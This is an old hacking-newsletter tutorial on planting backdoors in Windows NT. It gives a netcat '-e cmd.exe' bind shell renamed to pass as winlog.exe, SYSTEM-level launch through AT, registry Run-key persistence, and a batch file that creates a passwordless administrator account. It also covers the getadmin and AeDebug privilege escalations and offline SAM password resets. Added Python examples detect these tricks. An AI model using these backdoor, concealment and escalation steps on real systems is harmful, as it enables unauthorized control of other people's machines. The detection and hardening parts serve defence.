    __________________________________________________________
    
    GUIDE TO (mostly) HARMLESS HACKING
    
    
    
    Vol. 3 No. 10  Part 2
    
    
    
    How to Break into Windows NT: Backdoors and Practical Jokes
    
    ____________________________________________________________
    
    
    
    by keydet89@yahoo.com
    
    
    
    
    
    [Backdoors and Practical Jokes]
    
    
    
    Creating backdoors is how you ensure your ability to return to the
    system at will.  This is close to a black art on Un*x systems, and
    it can be done on NT too.
    
    
    
    netcat (Hobbit's original; the NT port is by Weld Pond) takes
    advantage of any user's ability to bind a local port.  netcat is a
    command-line utility with several switches that configure its
    operation, which makes it, combined with a properly built command
    line launched from a batch file, an excellent choice for a backdoor.

    (get netcat for NT from http://www.l0pht.com/weld)
    
    
    
    The batch file needs to contain:

    nc -L -d -p [port] -t -e cmd.exe

    -L  "listen harder": keep listening after the current session
        terminates (an addition in the NT port; plain -l exits when the
        first client disconnects)
    -d  detach from the console, so no DOS window appears while it is
        running (IMPORTANT)
    -p  the local port to bind to
    -t  answer telnet negotiation, so an ordinary telnet client can talk
        to it
    -e  program to run when a client connects; its input and output are
        tied to the connection

    Two things to keep in mind.  The listener runs with the rights of
    whoever started it, so a listener started by the Schedule service
    (see below) is a SYSTEM shell.  And there is no authentication at
    all: anyone who can reach the port owns the machine, and the port
    shows up as LISTENING in 'netstat -an'.
    
    
    
    Copy this command line into a batch file named "runnc.bat" or
    something similar.  Then copy both the netcat executable and the
    batch file to a directory that is in the PATH on the target
    machine...c:\winnt\system32\ is a good place to hide them.  Another
    little trick to keep in mind is to rename the netcat executable from
    'nc.exe' to something innocuous, like 'winlog.exe' (and make the
    matching change in the batch file).  That way, when you or your
    buddy opens Task Manager, there won't seem to be any 'unusual'
    programs running.  Run the batch file on your own machine, then
    open Task Manager (right-click on the TaskBar and choose Task
    Manager) and look at the Processes tab to see for yourself...
    
    
    
    Once this batch file is run, all you need to do is connect via
    telnet, or with netcat in client mode (-v is verbose, so you can see
    whether the connection succeeded):

    c:\>nc -v [ipaddress of target] [port]
    
    
    
    So how do you run this batch file?  By default, NT doesn't have an
    interactive telnet server installed that you can just log in to, so
    what do you do?  Well, there is a great little service called the
    Schedule (or 'AT') service, which lets you schedule programs to be
    run at a later time.  To see if your Schedule service is running,
    you can either click Control Panel -> Services and check it, or, if
    you have Perl installed (see above), run the following script, which
    checks whether the service is running and starts it if not:
    
    
    
    -----  begin script  -----
    # atchk.plx
    # Checks whether the Schedule (AT) service is running on the local
    # machine and starts it if not.  Minor modifications (a machine name
    # in place of '' and of Win32::NodeName()) will do the same thing on
    # a remote machine, once you have completed the IPC$ connection and
    # have Administrator rights there.
    #
    # usage: perl atchk.plx

    use strict;
    use Win32;
    use Win32::Service;

    my %status;

    # '' means the local machine.  CurrentState 4 is SERVICE_RUNNING.
    Win32::Service::GetStatus('', 'Schedule', \%status)
        || die "Can't query service status\n";
    die "Service is already started\n" if ($status{CurrentState} == 4);

    Win32::Service::StartService(Win32::NodeName(), 'Schedule')
        || die "Can't start service\n";

    print "Service started\n";
    # Note: this script was modified from:
    # http://www.inforoute.cgs.fr/leberre1/perlser.htm
    -----  end script  -----
    
    
    
    Note:  Only members of the local Administrators group can use the AT
    command, and the jobs it queues run under the account the Schedule
    service uses (LocalSystem unless someone changed it in Control Panel
    -> Services), so whatever you start this way runs as SYSTEM.

    Once installed, the 'runnc.bat' file can be executed via the AT
    command.  The necessary syntax for the AT command is:

    AT [\\computername] [time] "command"

    or more particularly (the time is given in 24-hour HH:MM form):

    AT [\\computername] [time] "runnc.bat"

    AT with no arguments lists the jobs queued on the local machine, and
    AT \\computername lists them on a remote one; that is also the first
    place an administrator will look for something like this.
    
    
    
    References to commands can be hidden in various places within the
    registry, set to run when a user logs in:

    HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run
    HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServices
    HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run

    (Each Run key has a RunOnce sibling whose entries are deleted after
    they run.  RunServices is processed by Windows 95/98; NT does not
    use it.)

    Note:  This last key (the HKEY_CURRENT_USER one) is where you will
    find things like AOL's Instant Messenger.  The install puts the
    reference to the app there, but you won't find it in your StartUp
    group...
    
    
    
    Here's another little exercise that you should run on your own
    machine first, and then try copying over to a friend's machine and
    running via the AT command.  The batch file below uses commands that
    are native to NT to create a new user account, make that user a
    member of the Administrators group, and drop it from the Users group:

    -----  begin batch file  -----
    @echo off
    net user Admin /add /expires:never /passwordreq:no
    net localgroup Administrators Admin /add
    net localgroup Users Admin /delete
    -----  end batch file  -----

    (/expires:never keeps the account from expiring; /passwordreq:no
    lets it have a blank password, which an account policy may refuse.
    Afterwards, 'net user' and 'net localgroup Administrators' show the
    new account and its group membership, which is exactly what a
    suspicious admin will run.)
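    As an added example (not from the original guide), here is the check
    from the other side: take the output of 'net user' and 'net localgroup
    Administrators' before and after, and list what appeared.  Both
    commands print a header, a line of dashes, the names laid out in
    columns, and a closing "The command completed successfully." line, so
    one small parser handles both.  The listings below are constructed in
    that layout, not captured from a real machine, and the machine name
    NTBOX is made up.

```python
"""Spot new accounts and new Administrators members from net.exe listings.

Added example, not part of the original guide.  The sample listings are
constructed in the layout `net user` and `net localgroup <group>` print on NT.
"""
import re


def parse_net_listing(text):
    """Return the set of names listed by `net user` or `net localgroup <group>`.

    Everything before the dashed line is header; after it, names are
    column-aligned with two or more spaces between columns, until the
    'The command completed successfully.' line.
    """
    names = set()
    in_body = False
    for line in text.splitlines():
        if line.startswith("-----"):
            in_body = True
            continue
        if not in_body:
            continue
        if line.startswith("The command completed"):
            break
        names.update(n for n in re.split(r"\s{2,}", line.strip()) if n)
    return names


def added_names(before, after):
    """Names present in the 'after' listing that were absent from the baseline."""
    return sorted(parse_net_listing(after) - parse_net_listing(before))


# Constructed sample data (not real output): the state before and after the
# batch file above has run.
ADMINS_BEFORE = """\
Alias name     Administrators
Comment        Members can fully administer the computer/domain

Members

-------------------------------------------------------------------------------
Administrator
The command completed successfully.
"""

ADMINS_AFTER = """\
Alias name     Administrators
Comment        Members can fully administer the computer/domain

Members

-------------------------------------------------------------------------------
Admin                    Administrator
The command completed successfully.
"""

USERS_BEFORE = """\
User accounts for \\\\NTBOX

-------------------------------------------------------------------------------
Administrator            Guest
The command completed successfully.
"""

USERS_AFTER = """\
User accounts for \\\\NTBOX

-------------------------------------------------------------------------------
Admin                    Administrator            Guest
The command completed successfully.
"""

if __name__ == "__main__":
    print("new accounts:", added_names(USERS_BEFORE, USERS_AFTER))
    print("new Administrators members:", added_names(ADMINS_BEFORE, ADMINS_AFTER))
```

    Saving the two listings from a freshly installed box (for example with
    'net user > baseline-users.txt') and rerunning the comparison later is
    a cheap way to catch this exercise, or its less friendly relatives.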
    
    
    
    What are some other neat little tricks to try?  Get Netbus from
    http://netbus.hypermart.net/ .  This little program is similar to
    Back Orifice, and it runs on NT.  (Visit the makers of Back Orifice
    at http://www.cultdeadcow.com/)

    Okay, so you and your 'leet buddies have played around with each
    other's machines via the Internet, and pretty much walked through the
    exercises listed above.  Now, what are some local 'attacks' that you
    can run against your own machine?
    
    
    
    [Local Attacks]
    
    
    
    Let's say you have a couple of accounts on your NT box, at least one
    with Admin rights, and one or two others with user rights.  You've
    already run through the password cracking exercise and seen how easy
    it is to get the 'SAM._' file and crack it.  So what else can you do?
    
    
    
    Well, try the 'getadmin' exploit.  This exploit consists of a program
    and a .dll file; run from an ordinary user account, it adds that user
    to the local Administrators group.

    Get the necessary files from:

    http://www.nmrc.org/files/nt/index.html

    Microsoft has a post-SP3 hotfix for the "getadmin" exploit (later
    service packs include it), located at:

    ftp://ftp.microsoft.com/bussys/winnt/winnt-public/fixes/usa/
    nt40/hotfixes-postSP3/getadmin-fix/

    General information on security problems addressed by Microsoft
    can be found at:

    http://www.microsoft.com/security/issues.htm

    For more information on the 'getadmin' exploit, go to:

    http://www.ntsecurity.net

    and search for 'getadmin'.

    All you need to do to test this exploit is log onto your system with
    an ordinary user account, copy the files into a directory, run
    getadmin.exe, and then check the Administrators group in User Manager
    (or with 'net localgroup Administrators').  On a box with the hotfix
    applied it should fail.
    
    
    
    Another local exploit similar to the "getadmin" exploit has popped up.
    The exploit works like this:  the user runs a program called
    "sechole.exe" and the final result (possibly after a reboot) is that
    the user now has administrator rights!  For more information on this
    and the zipped archive "sechole.zip", go to:

    http://www.technotronic.com/microsoft.html
    
    
    
    A variation on this exploit involves the Registry setting that
    determines the default debugger (the program launched when a user-mode
    program crashes).  Usually the setting is:

    Hive: HKEY_LOCAL_MACHINE
    Key:  \Software\Microsoft\Windows NT\CurrentVersion\AeDebug
    Value: Debugger
    Data Type: REG_SZ
    Default Value: drwtsn32 -p %ld -e %ld -g

    (drwtsn32 is Dr. Watson; the two %ld placeholders are filled in with
    the crashed process's ID and an event handle.)

    On an unhardened NT 4 box the "Everyone" group can set the value of
    this key, and that is essentially how you exploit it.  The debugger
    is launched in the security context of the crashed application, so
    all you need to do is change the Default Value (via 'regedit') to
    point to User Manager (usrmgr.exe), then crash one of the services
    that are running as SYSTEM.  User Manager then comes up as SYSTEM,
    and you can add accounts...even to the Administrators group.  The
    fix is to tighten the permissions on the AeDebug key so that only
    Administrators and SYSTEM can write it, and to check that Debugger
    still points at drwtsn32.
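    The autorun keys listed earlier and the AeDebug value above are both
    plain REG_SZ strings, so one audit can cover both.  The following is an
    added example (not from the original guide) that parses the text file
    regedit writes with Registry -> Export Registry File (the REGEDIT4
    format on NT 4) and flags Run entries that launch a batch file or a
    netcat-style "-e cmd.exe" listener, plus an AeDebug debugger that is
    no longer drwtsn32.  Working from an export means it runs anywhere,
    not only on the box being examined.  The sample export below is
    constructed; the renamed binary, the batch file name, the port number
    and the program names in it are made up to match the tricks described
    on this page.

```python
"""Audit a regedit export for the autorun and AeDebug tricks described above.

Added example, not part of the original guide.  Reads the REGEDIT4 text
format; only REG_SZ values are inspected.  The sample export is constructed.
"""
import re
from collections import namedtuple

Finding = namedtuple("Finding", "key name value reason")

# Keys compared case-insensitively; regedit exports write SOFTWARE in capitals.
RUN_KEYS = {
    r"hkey_local_machine\software\microsoft\windows\currentversion\run",
    r"hkey_local_machine\software\microsoft\windows\currentversion\runservices",
    r"hkey_current_user\software\microsoft\windows\currentversion\run",
}
AEDEBUG_KEY = r"hkey_local_machine\software\microsoft\windows nt\currentversion\aedebug"
DEFAULT_DEBUGGER = "drwtsn32"   # Dr. Watson, the NT default named in the guide

VALUE_RE = re.compile(r'^(?:"((?:[^"\\]|\\.)*)"|(@))=(.*)$')
BATCH_RE = re.compile(r"\.(bat|cmd)\b", re.I)
NC_EXEC_RE = re.compile(r"-e\s+(cmd(\.exe)?|command\.com)\b", re.I)


def _unescape(s):
    # regedit escapes backslashes and double quotes with a backslash
    return re.sub(r"\\(.)", r"\1", s)


def parse_reg_export(text):
    """Return {key_path: {value_name: data}} for the values in a regedit export."""
    entries = {}
    key = None
    for raw in text.splitlines():
        line = raw.strip()
        if line.startswith("[") and line.endswith("]"):
            key = line[1:-1]
            entries.setdefault(key, {})
            continue
        m = VALUE_RE.match(line)
        if not m or key is None:
            continue                       # REGEDIT4 header, blank line, or comment
        name = _unescape(m.group(1)) if m.group(1) is not None else "@"
        data = m.group(3)
        if data.startswith('"') and data.endswith('"'):
            entries[key][name] = _unescape(data[1:-1])   # REG_SZ
        else:
            entries[key][name] = data      # dword:/hex: kept raw, not audited
    return entries


def audit(entries):
    """Flag Run values that launch a batch file or a '-e <shell>' listener, and an
    AeDebug Debugger value that is no longer Dr. Watson."""
    findings = []
    for key, values in entries.items():
        k = key.lower()
        if k in RUN_KEYS:
            for name, data in values.items():
                if BATCH_RE.search(data):
                    findings.append(Finding(key, name, data, "autorun launches a batch file"))
                if NC_EXEC_RE.search(data):
                    findings.append(Finding(key, name, data, "netcat-style '-e <shell>' listener"))
        elif k == AEDEBUG_KEY:
            dbg = values.get("Debugger", "")
            if not dbg.lower().startswith(DEFAULT_DEBUGGER):
                findings.append(Finding(key, "Debugger", dbg, "AeDebug debugger is not drwtsn32"))
    return findings


# Constructed sample export: one clean entry, the renamed netcat from the
# guide, the batch file, and an AeDebug pointed at User Manager.
SAMPLE_EXPORT = r"""REGEDIT4

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"SystemTray"="SysTray.Exe"
"winlog"="C:\\WINNT\\system32\\winlog.exe -L -d -p 5555 -t -e cmd.exe"

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]
"runnc"="C:\\WINNT\\system32\\runnc.bat"

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\AeDebug]
"Auto"="1"
"Debugger"="usrmgr.exe"
"""

if __name__ == "__main__":
    for f in audit(parse_reg_export(SAMPLE_EXPORT)):
        print(f"{f.reason}: [{f.key}] {f.name} = {f.value}")
```

    The export cannot tell you who is allowed to write AeDebug; for that
    you still have to open the key in regedt32 and look at its
    permissions.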
    
    
    
    *******************************************************************
    NEWBIE NOTE:  Before any changes are made to the Registry, make
    sure that you make a backup of your current Registry using the
    "rdisk /s" utility.  You can make changes to the Registry by clicking
    Start -> Run, and entering either 'regedit' or 'regedt32'.  Before
    you attempt any of this, read the files pertaining to the Registry
    from the Rhino9 site (http://207.89.195.250/texts/), the "Hacker's
    Modern Desk Reference" (http://www.antionline.com/SpecialReports/MHD/)
    and even "Hardening NT" (http://pw2.netcom.com/~honeyluv/index.html).
    *******************************************************************
    
    
    
    Another local exploit that you can attempt uses the NTFSDOS utility,
    a DOS driver that, put on a bootable DOS diskette, can read (but not
    write to) NTFS partitions.  Anyone with physical access and a floppy
    drive the machine will boot from could potentially make off with
    copies of system files, including the SAM database; the defence is
    physical (disable floppy boot in the BIOS, password the BIOS, lock
    the case).  The folks at Systems Internals (http://www.sysinternals.com)
    have not only the NTFSDOS utility available, but also some tools that
    give the user limited write capability.  SysInternals also has
    NTRecover and NTLocksmith, along with a variety of other useful tools.

    Get a copy of the utility, and try booting your own system with the
    diskette in the A:\ drive.
    
    
    
    There is a nifty little utility available, one that is essentially a
    Linux boot disk:

    http://home.eunet.no/~pnordahl/ntpasswd/bootdisk.html

    The utility comes with rawrite.exe, so that DOS and Windows users can
    download the image and create the Linux boot disk.

    The boot disk is a minimal Linux kernel with NTFS support and a small
    program that lets the user change any password in the SAM database
    of the installed system.  Alternatively, you can find the Linux boot
    image (without the rawrite.exe utility) at:

    http://www.nmrc.org/files/snt/index.html

    called bootdisk.bin, and according to the description, this is the
    file you are interested in.  You will still need a copy of
    rawrite.exe in order to write the image to a diskette in a usable
    form.

    Carefully read the instructions on the web page for the utility
    (listed above) and if you are feeling especially '31337', try it out
    against your own system.
    
    
    
    [Final Words]
    
    
    
    By now you should be familiar with some of the methods used to attack
    and compromise an NT system.  Hopefully, you have seen fit to try out
    the exercises on your own system, or against a friend's system (with
    permission, of course).  And it should be starting to become clear
    what it takes to secure a system from attack.  The first step is to
    become familiar with the various exploits by regularly visiting such
    sites as RootShell (http://www.rootshell.com), the ISS X-Force site
    (http://www.iss.net/xforce), NTSecurity (http://www.ntsecurity.net),
    and NTBugTraq (http://www.ntbugtraq.com).  Then go to the Microsoft
    Support (http://support.microsoft.com) and Security
    (http://www.microsoft.com/security) sites to see what the 'official'
    fixes are...the NTBugTraq site does a great job of keeping track of
    the latest hotfixes, and which ones are obsolete.  The Microsoft
    Support site is especially useful, because you can search for
    information or specific KnowledgeBase articles, and print out those
    that you find useful.  The "Hardening NT" document from Santeria
    Systems (http://pw2.netcom.com/~honeyluv/index.html) provides an
    excellent guide for protecting your system, complete with references
    to the appropriate KnowledgeBase article for each step.  Finally,
    Microsoft maintains a list of security bulletins at:

    http://www.microsoft.com/security
    
    
    
    
    
    _______________________________________________________________________
    
    Where are those back issues of GTMHHs and Happy Hacker Digests? Check out
    
    the official Happy Hacker Web page at http://www.happyhacker.org.
    
    We are against computer crime. We support good, old-fashioned hacking of the
    
    kind that led to the creation of the Internet and a new era of freedom of
    
    information. But we hate computer crime.  So don't email us about any crimes
    
    you have committed!  
    
    To subscribe to Happy Hacker and receive the Guides to (mostly) Harmless
    
    Hacking, please email hacker@techbroker.com with message "subscribe
    
    happy-hacker" in the body of your message. 
    
    Copyright 1998 keydet89.  You may forward, print out or post this
    
    GUIDE TO (mostly) HARMLESS HACKING on your Web site as long as you leave
    
    this notice at the end.
    
    _________________________________________________________
    
    
    
    Carolyn Meinel
    
    M/B Research -- The Technology Brokers
    
    http://techbroker.com